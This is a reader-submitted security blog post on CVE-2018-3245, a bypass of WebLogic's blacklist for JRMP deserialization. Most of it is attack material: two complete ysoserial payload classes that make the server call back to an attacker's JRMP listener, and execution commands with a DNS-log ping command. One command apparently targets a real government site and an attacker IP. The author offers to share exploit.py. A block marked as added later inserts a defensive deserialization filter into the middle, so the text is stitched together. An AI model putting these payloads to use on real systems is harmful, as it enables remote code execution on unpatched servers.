WebLogic deserialization vulnerability CVE-2018-3245 (WebLogic deserialization vulnerability CVE-2018-2628 fix)

Reader submission | 390 | 2022-10-09



WebLogic deserialization vulnerability CVE-2018-3245

0x00 The fix for CVE-2018-2893

The fix for JRMP deserialization is, once again, to extend the blacklist:

Blacklisted packages: java.rmi.activation, sun.rmi.server
Blacklisted classes: java.rmi.server.UnicastRemoteObject, java.rmi.server.RemoteObjectInvocationHandler

0x01 Bypass

Because java.rmi.server.RemoteObjectInvocationHandler was added to the blacklist, all that is needed is a class that extends java.rmi.server.RemoteObject and is not itself on the blacklist, for example:

ReferenceWrapper_Stub
javax.management.remote.rmi.RMIConnectionImpl_Stub
com.sun.jndi.rmi.registry.ReferenceWrapper_Stub
javax.management.remote.rmi.RMIServerImpl_Stub
sun.rmi.registry.RegistryImpl_Stub
sun.rmi.transport.DGCImpl_Stub
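A defender-side check that follows from the list above, added here as an example and not part of the original post or of the WebLogic patch: every class in the bypass list is a subtype of java.rmi.server.RemoteObject, so a deserialization filter that rejects on the type hierarchy rather than on a list of names covers all of them, including stubs nobody thought to name. It assumes Java 9+ (java.io.ObjectInputFilter, JEP 290); the class name RemoteObjectFilterDemo is hypothetical, and the filter complements, not replaces, the vendor patch and an allowlist.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.rmi.server.RemoteObject;
import java.util.ArrayList;

public class RemoteObjectFilterDemo {

    // The property shared by every class in the bypass list: it is-a RemoteObject.
    // A type check covers stubs that a name-based blacklist does not mention.
    static boolean isRemoteObjectSubtype(Class<?> c) {
        return c != null && RemoteObject.class.isAssignableFrom(c);
    }

    // JEP 290 filter: reject RemoteObject subtypes; leave everything else UNDECIDED
    // so that a subsequent allowlist filter still gets to decide (never blanket ALLOWED).
    static final ObjectInputFilter REJECT_REMOTE_OBJECTS = info ->
            isRemoteObjectSubtype(info.serialClass())   // serialClass() is null for depth/size checks
                    ? ObjectInputFilter.Status.REJECTED
                    : ObjectInputFilter.Status.UNDECIDED;

    // Deserialize with the filter installed; a rejected class raises InvalidClassException.
    static Object readFiltered(byte[] bytes) throws Exception {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(REJECT_REMOTE_OBJECTS);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // The blacklisted handler, two of the bypass stubs, and one benign class.
        Class<?>[] samples = {
            java.rmi.server.RemoteObjectInvocationHandler.class,
            javax.management.remote.rmi.RMIConnectionImpl_Stub.class,
            javax.management.remote.rmi.RMIServerImpl_Stub.class,
            ArrayList.class
        };
        for (Class<?> c : samples) {
            System.out.println(c.getName() + " -> " + (isRemoteObjectSubtype(c) ? "REJECTED" : "undecided"));
        }
        // Constructed benign stream: an ArrayList still round-trips through the filtered stream.
        ArrayList<String> benign = new ArrayList<>();
        benign.add("ok");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(benign);
        }
        System.out.println("benign object read back: " + readFiltered(bos.toByteArray()));
    }
}
```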

0x02 Reproduction

Payload 1: replace RemoteObjectInvocationHandler with ReferenceWrapper_Stub:

package ysoserial.payloads;

import java.rmi.server.ObjID;
import java.util.Random;

import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

/**
 * UnicastRef.newCall(RemoteObject, Operation[], int, long)
 * DGCImpl_Stub.dirty(ObjID[], long, Lease)
 * DGCClient$EndpointEntry.makeDirtyCall(Set, long)
 * DGCClient$EndpointEntry.registerRefs(List)
 * DGCClient.registerRefs(Endpoint, List)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Thread.start()
 * DGCClient$EndpointEntry.<init>(Endpoint)
 * DGCClient$EndpointEntry.lookup(Endpoint)
 * DGCClient.registerRefs(Endpoint, List)
 * LiveRef.read(ObjectInput, boolean)
 * UnicastRef.readExternal(ObjectInput)
 *
 * Requires:
 * - JavaSE
 *
 * Argument:
 * - host:port to connect to, host only chooses random port (DOS if repeated many times)
 *
 * Yields:
 * * an established JRMP connection to the endpoint (if reachable)
 * * a connected RMI Registry proxy
 * * one system thread per endpoint (DOS)
 *
 * @author mbechler
 */
@SuppressWarnings({ "restriction" })
@PayloadTest(harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient3 extends PayloadRunner implements ObjectPayload {

    public ReferenceWrapper_Stub getObject(final String command) throws Exception {
        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        } else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }

        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        ReferenceWrapper_Stub stu = new ReferenceWrapper_Stub(ref);
        return stu;
    }

    public static void main(final String[] args) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
        PayloadRunner.run(JRMPClient3.class, args);
    }
}

Execution:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 1 aaaaaaawhoai.t00ls.766cba58c1dd.tu4.org'

python exploit.py wsbs.gxds.gov.cn 7001 ysoserial.jar 47.94.2xx.xxx 1099 JRMPClient3

Payload 2: replace RemoteObjectInvocationHandler with RMIConnectionImpl_Stub:

package ysoserial.payloads;

import java.rmi.server.ObjID;
import java.util.Random;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.util.PayloadRunner;
import javax.management.remote.rmi.RMIConnectionImpl_Stub;

@SuppressWarnings({ "restriction" })
public class JRMPClient5 extends PayloadRunner implements ObjectPayload {

    public Object getObject(final String command) throws Exception {
        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        } else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }

        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RMIConnectionImpl_Stub stub = new RMIConnectionImpl_Stub(ref);
        return stub;
    }

    public static void main(final String[] args) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient5.class.getClassLoader());
        PayloadRunner.run(JRMPClient5.class, args);
    }
}

Run it the same way as above.

If you need ysoserial.jar or exploit.py, leave a comment.

References:

https://xz.aliyun.com/t/2479#toc-3

https://anquanke.com/post/id/162390

